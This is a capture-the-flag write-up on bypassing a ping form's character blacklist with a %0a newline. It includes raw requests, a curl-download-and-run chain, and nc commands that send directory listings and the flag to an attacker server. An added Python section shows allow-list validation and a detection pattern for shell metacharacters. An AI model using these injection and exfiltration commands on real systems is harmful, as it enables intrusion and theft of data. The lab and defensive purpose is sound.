True unfreedom is building a cage inside your own heart.

Command Execution Bypass - Death Ping Command

A friend sent me a CTF challenge. When I opened the website, it was clear that there was a command execution vulnerability.

The packet capture test showed no echo, but it indicated that the command execution was successful.

The request is as follows:

POST /ping.php HTTP/1.1
Host: ctf.zhibangyang.cn:20508
Content-Length: 12
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://ctf.zhibangyang.cn:20508
Referer: http://ctf.zhibangyang.cn:20508/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1

Testing which characters were filtered showed that the following were blocked, which rules out the usual DNS log approach:

;`$

The DNS log method normally relies on backticks for command substitution, for example:

`whoami`.xxx.dnslog.cn

It turned out that % was not filtered, so the filter could be bypassed with %0a (a URL-encoded newline), which the shell treats as a command separator.
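To make the filter weakness concrete from the defender's side, here is an added Python example (not code from the original post): it reimplements the blacklist the write-up infers (";", "`" and "$" rejected, newline not), contrasts it with an allow-list check that only accepts a literal IP address, builds the ping command as an argv list so no shell is involved, and runs a simple detection rule over request bodies. The function names are my own; the request bodies are constructed samples, one of them the bypass body shown in this post.

```python
"""Why a character blacklist on a ping form fails, and what to do instead.

Added example, not code from the original post. Function and variable
names are assumptions of this example; the sample request bodies below are
constructed (one copies the %0a bypass body from the write-up).
"""
import ipaddress
import re
from urllib.parse import unquote_plus

# Characters the challenge's ping.php rejected, as inferred in the write-up.
BLACKLIST = frozenset(";`$")

# Shell metacharacters and control characters a defender should flag when they
# show up in a field that is supposed to contain nothing but an IP address.
SUSPICIOUS = re.compile(r"[\x00-\x1f\x7f|;&`$<>(){}]")


def weak_filter_accepts(ip):
    """Blacklist check, as the vulnerable endpoint appears to do it.
    Newline (%0a after URL decoding) is not in the list, so it passes."""
    return not any(ch in BLACKLIST for ch in ip)


def strict_validate(ip):
    """Allow-list check: the value must parse as a literal IPv4/IPv6 address.
    Anything else, including a command appended after a newline, is rejected."""
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return False
    return True


def build_ping_argv(ip):
    """Build the ping command as an argv list for subprocess.run(..., shell=False).
    Without a shell, metacharacters cannot start a second command; validation
    still runs first so an unexpected value never reaches ping at all."""
    if not strict_validate(ip):
        raise ValueError("ip parameter is not a literal IP address")
    return ["ping", "-c", "1", ip]


def extract_ip_param(body):
    """Pull the ip field out of an application/x-www-form-urlencoded body,
    percent-decoding it the way PHP's $_POST does (%0a becomes '\\n')."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if key == "ip":
            return unquote_plus(value)
    return ""


def inspect_request(body):
    """Classify one request body: what the weak filter and the strict validator
    decide, plus the suspicious characters a detection rule would report."""
    ip = extract_ip_param(body)
    flagged = sorted({repr(m.group()) for m in SUSPICIOUS.finditer(ip)})
    return {
        "ip": ip,
        "weak_filter_accepts": weak_filter_accepts(ip),
        "strict_validate": strict_validate(ip),
        "flagged_chars": flagged,
    }


# Constructed request bodies: the benign probe, the newline bypass from the
# write-up, and a classic ";"-separated attempt that the blacklist does catch.
SAMPLE_BODIES = [
    "ip=127.0.0.1",
    "ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh",
    "ip=127.0.0.1;id",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(inspect_request(body))
```

Running it shows the gap: the weak filter accepts the %0a body because none of its three banned characters appear, while the allow-list check rejects it and the detection rule reports the newline and the redirect. The fix is the combination of strict validation and calling ping without a shell; a longer blacklist only invites the next encoding trick.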

  1. Prepare a VPS and create a script named 1.sh on it with the following content:
     ls / | nc vps_address 1234
  2. On the VPS, use nc to listen for the connection and, in a second window, start a Python HTTP server so the target can download 1.sh:
     nc -lvnp 1234
     python3 -m http.server 80
  3. Have the target execute the following:
     ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh
     chmod 777 /tmp/4.sh
     /bin/sh /tmp/4.sh

The request is as follows:

POST /ping.php HTTP/1.1
Host: ctf.zhibangyang.cn:20508
Content-Length: 50
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://ctf.zhibangyang.cn:20508
Referer: http://ctf.zhibangyang.cn:20508/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh

The result: the output of the command came back to the nc listener.

To view the flag, simply modify the content of the 1.sh script as follows:

cat /FLAG | nc vps_address 1234

Run through it again to obtain the flag:

ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/5.sh
chmod 777 /tmp/5.sh
/bin/sh /tmp/5.sh

From the format of the flag, I recognized this as a challenge from n1book.
